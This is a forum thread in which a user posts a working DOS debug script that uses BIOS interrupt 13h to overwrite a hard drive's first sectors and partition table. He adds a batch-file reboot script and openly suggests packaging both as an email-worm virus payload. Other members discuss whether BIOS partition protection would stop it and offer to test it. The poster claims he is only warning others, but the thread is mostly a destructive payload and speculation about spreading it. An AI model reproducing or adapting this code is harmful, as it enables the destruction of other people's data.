possibly the world's deadliest virus

[antihaxor]

I want to post this simple and small debug script.

A:\>debug <enter>
-F 200 L1000 0 <enter>
-A CS:100 <enter>
xxxx:0100 MOV AX,301 <enter>
xxxx:0103 MOV BX,200 <enter>
xxxx:0106 MOV CX,1 <enter>
xxxx:0109 MOV DX,80 <enter>

(80 for hd 0 or 81 for hd 1 )

xxxx:010C INT 13 <enter>
xxxx:010E INT 20 <enter>
xxxx:0110 <enter>
-g <enter>
Program terminated normally
-q<enter>

this code invokes bios int13h to wipe out the first 1000 sectors on a hard drive....where the partion table info resides. This will wipe a hard drive clean. Now imagine using this code as a virus payload. There are of course some limitations to the effectivness of this potential virus....but it all the conditions are right this will wipe your hardrive CLEAN. I wonder if someone will figure out a way to encapsulate this payload in with email transport code. The way to block would be to have the Antivirus prog detect an unauthorised int13h invocation....any ideas anyone..could it be done?

[antihaxor]

I realize the prior script posted would require disk access not available with a GUI OS....I herefore propose this script to reboot the machine...the then heve a little .exe that has an object linker to call this .com prog. The only remaining thing to do is encapsualte it in a email transport worm. This would then wipe out any data on the hard drive.

reboot script inside a batch file:

GOTO BEGIN

E 40:72 34 12
RCS
FFFF
RIP
0000
G

:BEGIN
DEBUG < REBOOT.BAT

[Guus]

One thing: most up-to-date BIOSes start flashing messages whenever something tries to alter the partition-table...

[antihaxor]

hmmmmm....it would only catch the dos write interupt. The bios's own int13 would not be caught in this manner. The next time you have a box you want to Fdisk give the 1st script a try with the bios's AV turned on. I did it on mine(award bios) and it didn't say a thing

[Guus]

Heh! I'll try that.. to bad I just re-installed two weeks ago, don't feel like messing up everything again... Still, that'd be ... well, that'd definatly suck

[antihaxor]

If you do not have the desire to properly rebuff a post then Please do not assign antipoints to it. It is an abuse of the antipoint system to give - points without explaining why. Perhaps you think the post inappropiate..please state the reason. Someone gave me 5 - points for the last post..hmmmm thats about what you get hit with when the member has two dots..I <sarcasm>wonder</sarcasm> who it could be?

[Matty_Cross]

Originally posted by Guus

One thing: most up-to-date BIOSes start flashing messages whenever something tries to alter the partition-table...

While many BIOS's do have this feature, nearly all the ones I've seen have it turned off by default, most likely relying on the user to activate it after the operating system has been install. But the chances are that the common user would not know of its existence, and as such, it is still turned off..

Antihaxor: I have a computer that I need to do a fresh install of within the next couple of days.. I would be willing to test it for you if you wish.... providing it won't destroy the HDD...

[Guus]

Mine was turned on by default though - or I'm gravely mistaking - I got the same antipoints AH. Who's the one handing out that much negative points?

[antihaxor]

No Matty it will not damage any hardware..It will just wipe the first 1000 sectors clean requiring you to fdisk and format again. This is an excellent way to wipe out partition table viruii that reside outside the dos write interupt range(thus imune to a classic "format").

[antihaxor]

Originally posted by Guus
Mine was turned on by default though - or I'm gravely mistaking - I got the same antipoints AH. Who's the one handing out that much negative points?

It must be a SR member Guus because of the # of - points I got hit with. Perhaps the person in question feels I am trying to encourage virus writting..if so.. nothing is farther from the truth. I am just presenting a hypothectical situation to FORWARN others of a possible deadly attack